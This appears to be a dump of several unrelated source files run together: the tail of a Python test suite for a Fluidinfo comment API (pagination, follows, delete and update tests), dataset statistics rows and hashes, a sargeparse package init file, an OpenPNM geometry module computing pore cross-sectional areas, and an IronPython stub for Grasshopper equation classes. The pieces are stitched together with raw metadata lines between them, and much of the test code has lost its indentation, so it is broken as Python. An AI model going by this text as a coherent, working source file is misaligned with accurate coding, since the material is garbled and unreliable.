# Passing the newest comment's timestamp as nextPageID pages past it,
# leaving only the older 'Comment 1'.
result = yield self.invoke('getRecent', nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetRecentWithCurrentPageID(self):
"""
The C{getRecent} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
# Re-fetching with currentPageID=t returns only 'Comment 1' (one day
# newer than t) and reports its timestamp as the new currentPageID.
result = yield self.invoke('getRecent', currentPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetRecentWithMalformedNextPageID(self):
"""
The C{getRecent} method raises an error if the C{nextPageID} is not
well formed.
"""
result = yield self.invoke('getRecent', nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetRecentWithMalformedCurrentPageID(self):
"""
The C{getRecent} method raises an error if the C{currentPageID} is not
well formed.
"""
result = yield self.invoke('getRecent', currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetRecentReturnsNextPageID(self):
"""
The C{getRecent} method returns a C{nextPageID} value when another page
of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
# 26 comments, one per minute going back in time; one more than fits
# on a single 25-comment page.
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getRecent')
result = loads(result)['result']
# nextPageID is the oldest returned comment's timestamp:
# time - 24 minutes == 1336602960.
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetRecentWithFilterTagsAndAdditionalTags(self):
"""
The C{getRecent} method returns all comments with C{filterTags} present
and all values of the tags in C{additionalTags}.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/tag1': u'Monkey'}})
self.store.commit()
# Only Comment 2 carries username/tag1; requesting it via both
# filterTags and additionalTags returns just that comment with the
# tag value inlined.
result = yield self.invoke('getRecent',
filterTags=[u'username/tag1'],
additionalTags=[u'username/tag1'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [{u'fluidinfo.com/info/about': [u'about 2'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/tag1': u'Monkey'}]},
result)
@inlineCallbacks
def testGetAllFollowed(self):
"""
The C{getAllFollowed} method returns the comments on the followed
objects and users.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
# Mark both objects as followed by tagging them username/follows.
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getAllFollowed', username=u'username')
result = loads(result)['result']
# Comments on followed objects come back newest first.
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 2'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetAllFollowedWithNextPageID(self):
"""
The C{getAllFollowed} method uses the C{nextPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
# Mark both objects as followed by tagging them username/follows.
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
# Paging past the newest comment's timestamp leaves only 'Comment 1'.
result = yield self.invoke('getAllFollowed', username=u'username',
nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetAllFollowedWithCurrentPageID(self):
"""
The C{getAllFollowed} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
# Mark both objects as followed by tagging them username/follows.
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
# Re-fetching with currentPageID=t returns only the comment that is
# one day newer than t.
result = yield self.invoke('getAllFollowed', username=u'username',
currentPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetAllFollowedWithMalformedNextPageID(self):
"""
The C{getAllFollowed} method raises an error if the C{nextPageID} is
not well formed.
"""
result = yield self.invoke('getAllFollowed', username=u'username',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetAllFollowedWithMalformedCurrentPageID(self):
"""
The C{getAllFollowed} method raises an error if the C{currentPageID}
is not well formed.
"""
result = yield self.invoke('getAllFollowed', username=u'username',
currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetAllFollowedReturnsNextPageID(self):
"""
The C{getAllFollowed} method returns a C{nextPageID} value when
another page of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID = ObjectAPI(self.user).create(u'about')
TagValueAPI(self.user).set({objectID: {u'username/follows': None}})
comments = SecureCommentAPI(self.user)
# 26 comments on the followed object; one more than a 25-comment page.
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getAllFollowed', username='username')
result = loads(result)['result']
# nextPageID is the oldest returned comment's timestamp:
# time - 24 minutes == 1336602960.
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetFollowedObjectsWithoutFollows(self):
"""
The C{getFollowedObjects} method returns an empty C{list} if no
objects are being followed by the specified user.
"""
result = yield self.invoke('getFollowedObjects', username=u'username')
self.assertEqual({u'id': 100, u'jsonrpc': u'2.0',
u'result': {u'nextPageID': None, u'objects': []}},
loads(result))
@inlineCallbacks
def testGetFollowedObjects(self):
    """
    The C{getFollowedObjects} method returns a list of objects followed by
    the specified user along with an indication if the currently logged in
    user follows those objects too.
    """
    objectID1 = ObjectAPI(self.user).create(u'about 1')
    objectID2 = ObjectAPI(self.user).create(u'about 2')
    TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
                                objectID2: {u'username/follows': None}})
    self.store.commit()
    result = yield self.invoke('getFollowedObjects', username=u'username')
    result = loads(result)['result']
    self.assertEqual(None, result['nextPageID'])
    aboutValues = [u'about 1', u'about 2']
    # BUG FIX: this previously used assertTrue(2, len(...)), which always
    # passes -- assertTrue's first argument (2) is truthy and the second is
    # just the failure message.  Assert the actual length instead.
    self.assertEqual(2, len(result['objects']))
    # Can't be certain of the order the objects will be returned given that
    # they'll have the same creationTime value in the database.
    for obj in result['objects']:
        self.assertTrue(obj['about'] in aboutValues)
        self.assertEqual(True, obj['following'])
@inlineCallbacks
def testGetFollowedObjectsWithNextPageID(self):
"""
The C{getFollowedObjects} method uses the C{nextPageID} to return the
correct page of objects.
"""
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None}})
self.store.commit()
# Capture a timestamp between the two follows so it can be used as the
# page boundary; only the earlier follow ('about 1') falls before it.
timestamp = get_time()
TagValueAPI(self.user).set({objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
nextPageID=timestamp)
result = loads(result)['result']
self.assertEqual(None, result['nextPageID'])
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'about 1', result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowsWithMalformedNextPageID(self):
"""
The C{getFollowedObjects} method raises an error if the C{nextPageID}
is malformed.
"""
result = yield self.invoke('getFollowedObjects', username=u'username',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetFollowedObjectsWithURLObjectType(self):
"""
The C{getFollowedObjects} method returns a list of URL objects when
C{objectType} is C{'url'}.
"""
# Only objectID2 has a URL about value and should match the filter.
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'http://www.google.com')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='url')
result = loads(result)['result']
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'http://www.google.com',
result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowedObjectsWithUserObjectType(self):
"""
The C{getFollowedObjects} method returns a list of user objects when
C{objectType} is C{'user'}.
"""
# Only objectID2 has an @-prefixed (user) about value.
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'@paparent')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='user')
result = loads(result)['result']
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'@paparent',
result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowedObjectsWithHashtagObjectType(self):
"""
The C{getFollowedObjects} method returns a list of hashtag objects
when C{objectType} is C{'hashtag'}.
"""
# Only objectID2 has a #-prefixed (hashtag) about value.
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'#like')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='hashtag')
result = loads(result)['result']
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'#like',
result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowedObjectsWithoutURLObjectType(self):
"""
The C{getFollowedObjects} method returns an empty list if there is no
object of C{objectType} url.
"""
# Neither a hashtag nor a user object matches objectType='url'.
objectID1 = ObjectAPI(self.user).create(u'#like')
objectID2 = ObjectAPI(self.user).create(u'@paparent')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='url')
result = loads(result)['result']
self.assertEqual(0, len(result['objects']))
@inlineCallbacks
def testGetFollowedObjectsWithoutUserObjectType(self):
"""
The C{getFollowedObjects} method returns an empty list if there is no
object of C{objectType} user.
"""
# Neither a hashtag nor a URL object matches objectType='user'.
objectID1 = ObjectAPI(self.user).create(u'#like')
objectID2 = ObjectAPI(self.user).create(u'http://google.com')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='user')
result = loads(result)['result']
self.assertEqual(0, len(result['objects']))
@inlineCallbacks
def testGetFollowedObjectsWithoutHashtagObjectType(self):
"""
The C{getFollowedObjects} method returns an empty list if there is no
object of C{objectType} hashtag.
"""
# Neither a URL nor a user object matches objectType='hashtag'.
objectID1 = ObjectAPI(self.user).create(u'http://google.com')
objectID2 = ObjectAPI(self.user).create(u'@paparent')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='hashtag')
result = loads(result)['result']
self.assertEqual(0, len(result['objects']))
@inlineCallbacks
def testGetFollowsWithMalformedObjectType(self):
"""
The C{getFollowedObjects} method raises an error if the C{objectType}
is unknown.
"""
# An unrecognized objectType yields a BAD_REQUEST JSON-RPC error with
# the repr of the bad value embedded in the message.
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': (u"Unknown object type: %r."
% u'malformed'),
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetFollowedObjectsReturnsNextPageID(self):
"""
The C{getFollowedObjects} method returns a C{nextPageID} value when
another page of objects could be loaded.
"""
# 26 followed objects; a page holds 20, so a nextPageID must be set.
for i in range(26):
objectID = ObjectAPI(self.user).create(u'about%d' % i)
TagValueAPI(self.user).set({objectID: {u'username/follows': None}})
# Moving the commit here so (I suspect) the tags will each have a
# different timestamp.
self.store.commit()
result = yield self.invoke('getFollowedObjects', username='username')
result = loads(result)['result']
self.assertNotEqual(None, result['nextPageID'])
self.assertEqual(20, len(result['objects']))
@inlineCallbacks
def testDeleteExistingComment(self):
"""
The C{delete} method attempts to remove a comment and returns a count
of the number of comments that were successfully deleted.
"""
when = datetime.utcnow()
comments = SecureCommentAPI(self.user)
# create() returns the comment's payload; its URL identifies the
# comment for deletion.
values = comments.create(
u'comment', u'username', when=when, about=[u'chickens'],
importer=u'digg.com')
self.store.commit()
self.assertNotEqual([], comments.getForObject(u'chickens'))
result = yield self.invoke('delete',
url=values['fluidinfo.com/info/url'])
result = loads(result)['result']
self.assertEqual({'deletedComments': 1}, result)
self.store.commit()
# The comment must be gone from the object it was about.
self.assertEqual([], comments.getForObject(u'chickens'))
@inlineCallbacks
def testDeleteNonexistentComment(self):
    """
    The C{delete} method returns 0 deleted comments when a non-existent
    comment is deleted.
    """
    # BUG FIX: the body uses 'yield' but the method lacked the
    # @inlineCallbacks decorator every sibling test has, so it returned an
    # unconsumed generator and its assertions never ran.  The URL is also
    # now passed as the 'url' keyword, matching the other 'delete'
    # invocation in this suite.
    result = yield self.invoke('delete',
                               url='http://fluidinfo.com/comment/'
                                   'importer/username/2012-08-03T22:04:13')
    result = loads(result)['result']
    self.assertEqual({'deletedComments': 0}, result)
@inlineCallbacks
def testUpdateExistingComment(self):
"""The C{update} method updates the text of a comment."""
when = datetime.utcnow()
# Float epoch seconds as used in comment payloads: integer seconds
# plus the fractional part recovered via strftime('0.%f').
floatTime = timegm(when.utctimetuple()) + float(when.strftime('0.%f'))
comments = SecureCommentAPI(self.user)
values = comments.create(
u'comment', u'username', when=when, about=[u'chickens'],
importer=u'digg.com')
url = values['fluidinfo.com/info/url']
self.store.commit()
result = yield self.invoke('update',
url=url,
newText=u'new text')
result = loads(result)['result']
# Only the text changes; about, timestamp, url and username survive.
expected = {
u'fluidinfo.com/info/about': [u'chickens'],
u'fluidinfo.com/info/text': u'new text',
u'fluidinfo.com/info/timestamp': floatTime,
u'fluidinfo.com/info/url': url,
u'fluidinfo.com/info/username': u'username'
}
self.assertEqual(expected, result)
self.store.commit()
# The stored comment must reflect the update too.
[comment] = comments.getForObject(u'chickens')
self.assertEqual(expected, comment)
@inlineCallbacks
def testUpdateWithEmptyURL(self):
"""The C{update} method raises an error if the url is empty."""
result = yield self.invoke('update', url='', newText=u'new text')
result = loads(result)
self.assertEqual({
u'error': {
u'code': 400,
u'message': u'URL is missing or just contains whitespace.'
},
u'id': 100,
u'jsonrpc': u'2.0'}, result)
@inlineCallbacks
def testUpdateWithBadURL(self):
"""
The C{update} method raises an error if the url is not well formed.
"""
# The URL lacks the comment-path components, so any error is expected;
# the exact message is not asserted here.
result = yield self.invoke('update', url='http://something',
newText=u'new text')
result = loads(result)
self.assertIn(u'error', result)
@inlineCallbacks
def testUpdateWithEmptyText(self):
"""
The C{update} method raises an error if the text is empty.
"""
# A syntactically valid comment URL but empty newText; any error is
# acceptable, the exact message is not asserted.
result = yield self.invoke('update',
url='http://fluidinfo.com/comment/'
'importer/username/2012-08-03T22:04:13',
newText=u'')
result = loads(result)
self.assertIn(u'error', result)
| 44.663456
| 79
| 0.546505
| 7,567
| 74,186
| 5.353244
| 0.06013
| 0.058063
| 0.071492
| 0.071344
| 0.8189
| 0.797151
| 0.779155
| 0.757579
| 0.734077
| 0.708922
| 0
| 0.032272
| 0.326679
| 74,186
| 1,660
| 80
| 44.690361
| 0.778683
| 0.112204
| 0
| 0.781199
| 0
| 0
| 0.234234
| 0.072998
| 0
| 0
| 0
| 0
| 0.073744
| 1
| 0.059968
| false
| 0.001621
| 0.017828
| 0
| 0.080227
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89240dcff30e74ab0f6666ad094a454271c919aa
| 249
|
py
|
Python
|
sargeparse/_parser/__init__.py
|
DiegoPomares/sargeparseN
|
32424cd1a87c8efba4a2e2c08540478bec9f63a2
|
[
"Apache-2.0"
] | 1
|
2018-09-05T12:51:16.000Z
|
2018-09-05T12:51:16.000Z
|
sargeparse/_parser/__init__.py
|
DiegoPomares/sargeparseN
|
32424cd1a87c8efba4a2e2c08540478bec9f63a2
|
[
"Apache-2.0"
] | 23
|
2018-05-30T10:39:38.000Z
|
2018-07-11T12:50:39.000Z
|
sargeparse/_parser/__init__.py
|
DiegoPomares/sargeparseN
|
32424cd1a87c8efba4a2e2c08540478bec9f63a2
|
[
"Apache-2.0"
] | 1
|
2018-07-10T16:42:26.000Z
|
2018-07-10T16:42:26.000Z
|
from sargeparse._parser.argument import Argument # NOQA
from sargeparse._parser.group import ArgumentGroup, MutualExclussionGroup # NOQA
from sargeparse._parser.data import ArgumentData # NOQA
from sargeparse._parser.parser import Parser # NOQA
| 49.8
| 81
| 0.831325
| 29
| 249
| 7
| 0.37931
| 0.275862
| 0.394089
| 0.35468
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116466
| 249
| 4
| 82
| 62.25
| 0.922727
| 0.076305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8937e10ffe58badc5a6c48edf2665cf932bc5fb3
| 128
|
py
|
Python
|
project_checker/checker/filesystem/__init__.py
|
zuzannnaobajtek/github-cmake-project-checker
|
1406c2247bbbecb490bc5000c7fa521b9bf96ec0
|
[
"MIT"
] | 1
|
2017-05-17T21:21:54.000Z
|
2017-05-17T21:21:54.000Z
|
project_checker/checker/filesystem/__init__.py
|
zuzannnaobajtek/github-cmake-project-checker
|
1406c2247bbbecb490bc5000c7fa521b9bf96ec0
|
[
"MIT"
] | 13
|
2018-03-28T15:36:17.000Z
|
2018-04-25T16:44:00.000Z
|
project_checker/checker/filesystem/__init__.py
|
zuzannnaobajtek/github-cmake-project-checker
|
1406c2247bbbecb490bc5000c7fa521b9bf96ec0
|
[
"MIT"
] | 15
|
2017-05-31T11:44:20.000Z
|
2018-04-19T15:03:35.000Z
|
from project_checker.checker.filesystem.directory import Directory
from project_checker.checker.filesystem.report import Report
| 42.666667
| 66
| 0.890625
| 16
| 128
| 7
| 0.4375
| 0.196429
| 0.321429
| 0.446429
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 128
| 2
| 67
| 64
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
89a9b0371ff90516dd2f849cd5fd1d34134e34b9
| 3,649
|
py
|
Python
|
openpnm/models/geometry/pore_cross_sectional_area.py
|
halotudio/openPNM-copy2
|
d400ec65e9421256a531f6d22a38255b002d5dcb
|
[
"MIT"
] | 1
|
2021-05-01T11:10:43.000Z
|
2021-05-01T11:10:43.000Z
|
openpnm/models/geometry/pore_cross_sectional_area.py
|
halotudio/openPNM-copy2
|
d400ec65e9421256a531f6d22a38255b002d5dcb
|
[
"MIT"
] | null | null | null |
openpnm/models/geometry/pore_cross_sectional_area.py
|
halotudio/openPNM-copy2
|
d400ec65e9421256a531f6d22a38255b002d5dcb
|
[
"MIT"
] | null | null | null |
from numpy import pi as _pi
def sphere(target, pore_diameter='pore.diameter'):
    r"""
    Calculate cross-sectional area assuming the pore body is a sphere.

    Parameters
    ----------
    target : GenericGeometry
        The Geometry object this model is associated with; controls the
        length of the calculated array and provides access to the other
        geometric properties it needs.
    pore_diameter : str
        Dictionary key of the pore diameter array on the Geometry object.

    Returns
    -------
    ndarray
        Array containing pore cross-sectional area values.
    """
    diam = target[pore_diameter]
    # Area of the sphere's great circle: pi/4 * d^2.
    return 0.25 * _pi * diam ** 2
def cone(target, pore_diameter='pore.diameter'):
    r"""
    Calculate cross-sectional area assuming the pore body is a cone.

    Parameters
    ----------
    target : GenericGeometry
        The Geometry object this model is associated with; controls the
        length of the calculated array and provides access to the other
        geometric properties it needs.
    pore_diameter : str
        Dictionary key of the pore diameter array on the Geometry object.

    Returns
    -------
    ndarray
        Array containing pore cross-sectional area values.
    """
    diam = target[pore_diameter]
    # The cone's circular base: pi/4 * d^2.
    return 0.25 * _pi * diam ** 2
def cube(target, pore_diameter='pore.diameter'):
    r"""
    Calculate cross-sectional area assuming the pore body is a cube.

    Parameters
    ----------
    target : GenericGeometry
        The Geometry object this model is associated with; controls the
        length of the calculated array and provides access to the other
        geometric properties it needs.
    pore_diameter : str
        Dictionary key of the pore diameter array on the Geometry object.

    Returns
    -------
    ndarray
        Array containing pore cross-sectional area values.
    """
    side = target[pore_diameter]
    # Square face of the cube.
    return side * side
def circle(target, pore_diameter='pore.diameter'):
    r"""
    Calculate cross-sectional area assuming the pore body is a circle.

    Parameters
    ----------
    target : GenericGeometry
        The Geometry object this model is associated with; controls the
        length of the calculated array and provides access to the other
        geometric properties it needs.
    pore_diameter : str
        Dictionary key of the pore diameter array on the Geometry object.

    Returns
    -------
    ndarray
        Array containing pore cross-sectional area values.

    Notes
    -----
    This model should only be used for true 2D networks, i.e. with planar
    symmetry.  In 2D the "cross-section" of a circle is a line, so the
    diameter itself is returned unchanged.
    """
    area = target[pore_diameter]
    return area
def square(target, pore_diameter='pore.diameter'):
    r"""
    Calculate cross-sectional area assuming the pore body is a square.

    Parameters
    ----------
    target : GenericGeometry
        The Geometry object this model is associated with; controls the
        length of the calculated array and provides access to the other
        geometric properties it needs.
    pore_diameter : str
        Dictionary key of the pore diameter array on the Geometry object.

    Returns
    -------
    ndarray
        Array containing pore cross-sectional area values.

    Notes
    -----
    This model should only be used for true 2D networks, i.e. with planar
    symmetry.  In 2D the "cross-section" of a square is a line, so the
    diameter itself is returned unchanged.
    """
    area = target[pore_diameter]
    return area
| 28.069231
| 73
| 0.665936
| 461
| 3,649
| 5.232104
| 0.158351
| 0.124378
| 0.074627
| 0.045605
| 0.965174
| 0.965174
| 0.965174
| 0.965174
| 0.965174
| 0.965174
| 0
| 0.002622
| 0.268293
| 3,649
| 129
| 74
| 28.286822
| 0.900749
| 0.74952
| 0
| 0.368421
| 0
| 0
| 0.120148
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| false
| 0
| 0.052632
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
9823bf8a463868c0fdbfd2340a9fda285173549d
| 6,217
|
py
|
Python
|
release/stubs.min/Grasshopper/GUI/Equations.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 182
|
2017-06-27T02:26:15.000Z
|
2022-03-30T18:53:43.000Z
|
release/stubs.min/Grasshopper/GUI/Equations.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 28
|
2017-06-27T13:38:23.000Z
|
2022-03-15T11:19:44.000Z
|
release/stubs.min/Grasshopper/GUI/Equations.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 67
|
2017-06-28T09:43:59.000Z
|
2022-03-20T21:17:10.000Z
|
# encoding: utf-8
# module Grasshopper.GUI.Equations calls itself Equations
# from Grasshopper,Version=1.0.0.20,Culture=neutral,PublicKeyToken=dda4f5ec2cd80803
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
# Auto-generated IronPython stub for the .NET type
# Grasshopper.GUI.Equations.GH_EquationFragment; methods are signature
# placeholders only (all bodies are `pass`).
# NOTE(review): this class subclasses IGH_EquationFragment, which in this
# dump appears to be defined *after* it — presumably harmless in the real
# generated file; verify definition order before executing.
class GH_EquationFragment(object,IGH_EquationFragment):
    # no doc
    def Layout(self,font):
        """ Layout(self: GH_EquationFragment,font: Font) -> bool """
        pass
    def Position(self,location):
        """ Position(self: GH_EquationFragment,location: PointF) -> bool """
        pass
    def Render(self,graphics,font,colour):
        """ Render(self: GH_EquationFragment,graphics: Graphics,font: Font,colour: Color) """
        pass
    def ToExpression(self):
        """ ToExpression(self: GH_EquationFragment) -> str """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __repr__(self,*args):
        """ __repr__(self: object) -> str """
        pass
    # Stubbed .NET properties: getter returns a placeholder object, setter
    # is a no-op; the bare strings below each one are generator-emitted
    # type annotations.
